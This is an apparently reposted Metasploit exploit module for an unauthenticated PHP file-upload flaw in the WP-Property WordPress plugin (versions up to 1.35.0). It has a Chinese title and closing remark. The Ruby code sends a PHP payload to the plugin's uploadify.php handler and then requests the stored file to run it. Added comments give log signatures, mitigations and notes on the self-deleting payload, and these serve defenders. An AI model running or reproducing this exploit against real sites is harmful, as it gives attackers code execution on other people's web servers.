WordPress WP-Property PHP 文件上传漏洞

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

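# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description below).
#
# Root cause as described by the module: the plugin ships
# third-party/uploadify/uploadify.php, which accepts a multipart upload
# without authentication. The module asks for the file to be stored in the
# uploadify directory itself and then requests the path the server returns.
#
# Defender notes, derived from the requests this module sends:
# * Log signature: a POST to
#   .../wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   carrying the form fields "Filedata" and "folder", followed by a GET for
#   a *.php file that did not exist before.
# * Mitigation: run a plugin release newer than the affected range, remove
#   or block direct access to uploadify.php, and deny PHP execution in
#   directories that receive uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The scraped listing had this mixin name mangled to "Msf::Exploit: hpEXE";
  # get_write_exec_payload (used in #exploit) comes from PhpEXE.
  include Msf::Exploit::PhpEXE

  # Plugin-relative location of the uploadify handler directory.
  UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'

  # Registers module metadata (references, targets, payload constraints) and
  # the TARGETURI option that points at the WordPress base path.
  #
  # @param info [Hash] metadata overrides passed in by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the presence of the uploadify handler with a single GET.
  #
  # NOTE(review): an HTTP 200 only shows that the script path answers; it
  # does not establish the plugin version. A patched install that still
  # ships the file, or a site that answers 200 for every path, will also be
  # reported as Appears, so treat the result as a hint to verify the
  # installed plugin version rather than as confirmation.
  #
  # @return [Array] Exploit::CheckCode::Appears on HTTP 200, otherwise
  #   Exploit::CheckCode::Unknown
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uploadify_dir}uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php and then
  # requests the location the server reports back.
  #
  # The payload is built with :unlink_self, i.e. it is asked to delete its
  # own file when it runs. Incident responders should therefore not expect
  # the uploaded file to remain on disk and should rely on the web server
  # access log (the POST/GET pair described on the class) instead.
  #
  # @return [void]
  def exploit
    peer = "#{rhost}:#{rport}"
    target_dir = uploadify_dir

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form-data parts: the file itself and the destination folder.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part(target_dir, nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a part boundary at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{target_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The handler is expected to echo the stored path, which must contain
    # the file name that was just sent.
    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Builds the URI of the uploadify directory below TARGETURI.
  #
  # A new string is built instead of appending to target_uri.path with <<,
  # so the path object handed out by the framework is never modified.
  #
  # @return [String] base path with exactly one separating slash, followed
  #   by UPLOADIFY_DIR
  def uploadify_dir
    base = target_uri.path.to_s
    base = "#{base}/" unless base.end_with?('/')
    "#{base}#{UPLOADIFY_DIR}"
  end
end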
不要问我这写的是什么 怎么利用 我是说msf.